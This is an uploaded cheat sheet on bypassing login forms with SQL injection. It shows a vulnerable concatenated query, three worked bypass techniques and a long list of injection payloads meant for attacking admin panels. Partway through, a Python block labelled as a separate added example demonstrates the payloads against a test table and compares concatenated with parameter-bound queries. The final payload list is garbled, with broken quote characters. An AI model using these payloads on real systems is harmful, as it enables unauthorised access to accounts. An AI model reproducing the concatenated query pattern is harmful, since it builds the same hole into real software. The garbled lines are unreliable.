Admin Panel Bypass

This document discusses various SQL injection techniques for bypassing authentication on a database by manipulating the WHERE clause of a SQL SELECT statement. It provides examples of inserting comments, alternate syntax, concatenation, and boolean logic to circumvent validation of the username and password fields. Potential attackers are shown how to craft SQL statements that will always evaluate to true and return all account data regardless of the intended credentials.

Uploaded by

Bilal Sheikh

username = ?

password = ?

query: select * from accounts where username='$username' and password='$password' ;

Suppose username = admin

For bypassing password:

Technique #1: select * from accounts where username='admin' # and password='$password' ;

username=admin' #
password= [any word / random]

Technique #2: select * from accounts where username='admin' and password='12345' OR 1=1 # ;

username=admin
password=[any number / random]' OR 1=1 #

Technique #3: select * from accounts where username=' ' OR ' ' = ' ' and password=' ' OR ' ' = ' ' ;

Variant: select * from accounts where username=' ' OR '1' = '1' and password=' ' OR '1' = '1' ;

username=' or ' '='
password=' or ' '='
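All three techniques work only because the input is pasted into the SQL text. The following added example (not part of the original document) runs the page's query in both concatenated and parameter-bound form against a constructed in-memory SQLite table. It assumes SQLite, so `--` replaces the MySQL `#` comment; the function names and sample passwords are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the page's query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [("admin", "constructed-admin-pw"), ("bob", "constructed-bob-pw")])
    return db

def login_concat(db, username, password):
    """The page's query: user input is pasted into the SQL text."""
    sql = ("select * from accounts where username='%s' and password='%s'"
           % (username, password))
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input left the statement syntactically invalid

def login_bound(db, username, password):
    """Same query with bound parameters: input is compared as data only."""
    sql = "select * from accounts where username=? and password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

# Inputs from the three techniques, with `--` standing in for `#`.
PAGE_INPUTS = [
    ("admin' --", "anything"),        # Technique #1: comment out the password test
    ("admin", "12345' OR 1=1 --"),    # Technique #2: OR 1=1 after the password
    ("' or '1'='1", "' or '1'='1"),   # Technique #3, '1'='1' form
]

def compare(db):
    """Return (concatenated_result, bound_result) for each page input."""
    return [(login_concat(db, u, p), login_bound(db, u, p)) for u, p in PAGE_INPUTS]

if __name__ == "__main__":
    db = make_db()
    for (u, p), (weak, safe) in zip(PAGE_INPUTS, compare(db)):
        print(f"user={u!r:16} pass={p!r:20} concatenated={weak} bound={safe}")
    print("valid login, bound:", login_bound(db, "admin", "constructed-admin-pw"))
```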

Other techniques: (for both username and password)

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

� or 1=1 �
1'or�1'=�1
admin��
� or 0=0 �
or 0=0 �
� or 0=0 #
� or 0=0 #
or 0=0 #
� or �x�='x
� or �x�=�x
�) or (�x�='x
� or 1=1�
� or 1=1�
or 1=1�
� or a=a�
� or �a�=�a
�) or (�a�='a
�) or (�a�=�a
hi� or �a�=�a
hi� or 1=1 �
hi� or 1=1 �
hi� or �a�='a
hi�) or (�a�='a
hi�) or (�a�=�)